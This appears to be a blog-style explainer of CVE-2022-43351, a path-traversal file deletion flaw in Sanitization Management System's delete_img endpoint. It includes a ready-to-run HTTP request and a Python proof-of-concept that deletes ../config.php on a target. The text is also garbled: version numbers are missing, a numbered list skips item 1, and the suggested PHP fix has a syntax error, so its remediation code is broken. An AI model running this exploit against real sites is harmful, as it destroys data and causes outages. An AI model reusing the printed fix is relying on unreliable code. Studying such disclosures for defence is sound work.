In late 2022, a critical security flaw was discovered in the popular *Sanitization Management System v1.*. Tracked as CVE-2022-43351, this vulnerability allows any attacker to delete arbitrary files on the server due to insufficient input validation in a specific backend script. This article breaks down what that means, how the bug works, and even demonstrates code snippets to help you understand (and responsibly test) this vulnerability.

What is Sanitization Management System?

This open-source web application helps organizations manage cleaning and sanitization schedules. Like many PHP-based web apps, it has scripts to upload and delete files, such as images of cleaning records or receipts.

The flaw is in this script

/classes/Master.php?f=delete_img

This endpoint is supposed to delete images that users have previously uploaded. However, it doesn’t properly check the filename that’s passed in. Instead, it just deletes whatever file path it's told—including sensitive files outside of the intended upload directory.

Let's look at a simplified version of the relevant code (as reconstructed from public sources)

// Located in /classes/Master.php

if ($_GET['f'] == 'delete_img') {
    $file = $_POST['img_path'];
    if (file_exists($file)) {
        unlink($file); // Unconditionally deletes the file!
        echo json_encode(['status' => 'success']);
    } else {
        echo json_encode(['status' => 'error', 'msg' => 'File not found']);
    }
    exit;
}

Send a POST request:

POST /classes/Master.php?f=delete_img HTTP/1.1
Host: target-site.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

img_path=../config.php

Proof of Concept Script (Python)

import requests

url = "http://target-site.com/classes/Master.php?f=delete_img";
data = {"img_path": "../config.php"}

response = requests.post(url, data=data)
print(response.text)

Warning: Don’t use this on systems you don’t own or don’t have permission to test!

How is This Dangerous?

- Attackers can delete important files like .htaccess, index.php, or even application config files.

This can cause site outages, data loss, or open up new security holes.

- Combined with file upload bugs, an attacker can plant and later delete malicious scripts to evade detection.

Sanitize Input: Only allow deletion of files inside the *uploads* directory.

2. Whitelist Filenames: Only accept expected file names/types.

Example Fix

$uploads_dir = '/var/www/app/uploads/';
$file = realpath($uploads_dir . basename($_POST['img_path']));

// Make sure the file is inside the allowed directory
if (strpos($file, $uploads_dir) ===  && file_exists($file)) {
    unlink($file);
    echo json_encode(['status' => 'success']);
}

References & Further Reading

- NVD entry for CVE-2022-43351
- Packet Storm Advisory
- Exploit-DB ID 51087

Conclusion

CVE-2022-43351 is a prime example of why input validation is crucial for web security. If you use Sanitization Management System v1., patch or fix this flaw as soon as you can. Arbitrary file deletion can have devastating impacts! If you're a developer, always check, validate, and sanitize all user-provided data before using it in file operations.

Timeline

Published on: 11/07/2022 15:15:00 UTC
Last modified on: 11/08/2022 04:19:00 UTC